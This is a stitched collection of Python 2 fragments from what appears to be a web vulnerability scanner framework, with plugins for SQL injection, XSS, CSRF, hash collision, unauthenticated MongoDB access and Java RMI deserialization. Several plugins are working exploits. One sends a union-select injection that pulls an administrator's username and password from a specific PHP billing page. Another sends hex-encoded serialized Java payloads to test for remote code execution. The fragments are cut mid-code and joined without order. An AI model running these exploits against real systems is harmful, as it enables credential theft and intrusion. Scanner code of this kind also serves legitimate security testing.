def check(): while 1: data=r.lpop('data') if data: print "[ ------------- CHECK DATA ------------- ]" jsonData=json.loads(data) jsonData=byteify(jsonData) print "CHECKING SQLI" main(SqliScan(jsonData)) print "CHECKING XSS" main(XssScan(jsonData)) print "CHECKING CSRF" main(CsrfScan(jsonData)) print "CHECKING HASHCOLLISISON" main(HashcollisionScan(jsonData)) print "[ ------------- WAITING NEXT ------------- ]" else: time.sleep(10)
def check(): datas = r.lrange('data', 0, -1) for data in datas: if data: print "[ ------------- CHECK DATA ------------- ]" jsonData = json.loads(data) jsonData = byteify(jsonData) #print "CHECKING SQLI" #main(SqliScan(jsonData)) print "CHECKING XSS" main(XssScan(jsonData)) print "CHECKING CSRF" main(CsrfScan(jsonData)) print "CHECKING HASHCOLLISISON" main(HashcollisionScan(jsonData)) print "[ ------------- WAITING NEXT ------------- ]" else: time.sleep(10)
}, "description": "", "error": "", }) def verify(self): host = self.option.host port = self.option.port try: conn = pymongo.MongoClient(host=host, port=port) db_names = conn.database_names() except Exception, e: self.result.error = "连接发生错误: {error}".format(error=str(e)) return self.result.status = True self.result.data.db_info.db_name = str(db_names) self.result.description = "目标 {host} 的 mongodb 可以未授权访问, 数据库名: {db_names}".format( host=self.option.host, db_names=str(db_names) ) def exploit(self): self.verify() if __name__ == '__main__': from modules.main import main main(TangScan())
"{domain}/php/bill/list_userinfo.php?domain=fatezero.org&ok=1&cp=1 union select concat(0x7e7e7e," "oid,0x7c7c7c,password,0x7e7e7e),2,3,4,5 from admininfo%23".format( domain=self.option.url)) try: response = requests.get(exp_url, cookies=cookies, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return re_result = re_userinfo_pattern.findall(response.content) if len(re_result) == 0: self.result.status = False return self.result.status = True self.result.data.user_info.username = re_result[0][0] self.result.data.user_info.password = re_result[0][1] self.result.description = "目标 {url} 存在sql注入, 目标管理员用户: {username}, 密码: {password}".format( url=self.option.url, username=self.result.data.user_info.username, password=self.result.data.user_info.password) if __name__ == '__main__': from modules.main import main main(TangScan())
javajsondata) - 2.3 * trantime IfExist = False for name in times: if times[name] > limit: print "Probably have HashCollision==>", payload = "TYPE : " + name + " SERVER RUNNING TIME : " + str( times[name]) self.payloads.append(payload) IfExist = True return IfExist except: print "-------------connect error-------------" return False def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': from modules.main import main main(HashcollisionScan()) main(HashcollisionScan()) main(HashcollisionScan()) main(HashcollisionScan()) main(HashcollisionScan())
if "Payload" in row: payload = row.split(": ")[1] self.payloads.append(payload) if "Parameter:" in row: prepara = row.split(": ")[1] #prepare如 "#1* (URI)" if "URI" in prepara: # prepare由此截取出一个数字 prepara = prepara.split("#")[1].split("*")[0] para = URI[int(prepara) - 1] + "(GET)" #print chardet.detect(URI[int(prepara)-1]) elif "POST" in prepara: prepara = prepara.split("#")[1].split("*")[0] para = POST[int(prepara) - 1] + "(POST)" self.paras.append(para) return True #file_data="success: [",vul_time,"] url:",url," payload:",payload," cookie:",cookie,"","\n" def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': from modules.main import main main(SqliScan())
time.localtime(time.time())) if 'Success' in stdout: self.payloads.append(scanurl) self.paras.append(psbkey) break def changePara(self, para): qs = "" for key in para: val = para[key] if qs: #qs += "&" + urllib.quote(key) + "=" + urllib.quote(val) qs += "&" + key + "=" + val else: #qs += urllib.quote(key) + "=" + urllib.quote(val) qs += key + "=" + val return qs def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': from modules.main import main main(XssScan())
except: ##print "无COOKIE ————————————————" cookie = "" #print cookie csrf = csrfCheck() forms = csrf.check(url, cookie) #print forms if len(forms) == 0: return False else: #print url for form in forms: #self.plugin_info["target"] += " -- 表单:" payload = re.findall("<form[\s\S]*?>", form)[0] self.payloads.append(payload) return True #csrf.show(result) def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': #print "你好" from modules.main import main main(CsrfScan())
#coding:utf-8 import redis import json from csrf import CsrfScan from sqli import SqliScan from modules.main import main from xss import XssScan import time r = redis.Redis(host='127.0.0.1', port=6379, db=0) #while True: datas = r.lrange('data', -1, -1) #print datas for data in datas: #print data if data: jsonData = json.loads(data) exist = main( XssScan(jsonData) ) #传入的字典需要由插件判断是否存在某key,如cookie可能不存在,在进行 data['coookie']提取时会报错 if exist: "[ 检测出存在漏洞 ]" else: print "不存在" else: print "NO DATA"
"severity": self.level.high, # 漏洞等级 "privileged": False, # 是否需要登录 "target": self.target #漏洞目标 } def match(self): """ 匹配是否调用此插件 :return: """ return True def check(self): """ 验证类型,尽量不触发waf规则 :return: """ pass def result(self): """ 攻击类型 :return: """ pass if __name__ == '__main__': from modules.main import main main(MeScan())
# /usr/bin/env python # coding:utf-8 # author:ZhaoHu import os import sys sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) from modules import main if __name__ == '__main__': main.main()
"b70016bf00010000002b002b0010000200240000001e0007000000130008001400100015002b0018002c001a0039" \ "001c003b001f00270000000c00026b07002ffc000f070030002b000000040001001000090031003200020023000" \ "000220001000100000006121db8001eb10000000100240000000a00020000002600050027002b00000004000100" \ "100001003300000002003474000577726974657571007e001d000000017671007e002e737200116a6176612e757" \ "4696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c" \ "647078703f4000000000000c7708000000100000000174000576616c756571007e003578787672001b6a6176612" \ "e6c616e672e616e6e6f746174696f6e2e5461726765740000000000000000000000707870" send_data_first = binascii.a2b_hex(send_packet_first) send_data_second = binascii.a2b_hex(send_packet_second) sock.send(send_data_first) recv_packet = sock.recv(1024) ip = recv_packet[3:-4] time.sleep(1) sock.send(send_data_second) packet = sock.recv(1024) packet = sock.recv(1024) if ip in packet: self.result.status = True self.result.data.infos = '存在 Java RMI 反序列化代码执行' except: print "请检查源码" def exploit(self): if self.result.exp_status: print " debug test" if __name__ == '__main__': from modules.main import main main(PLScan())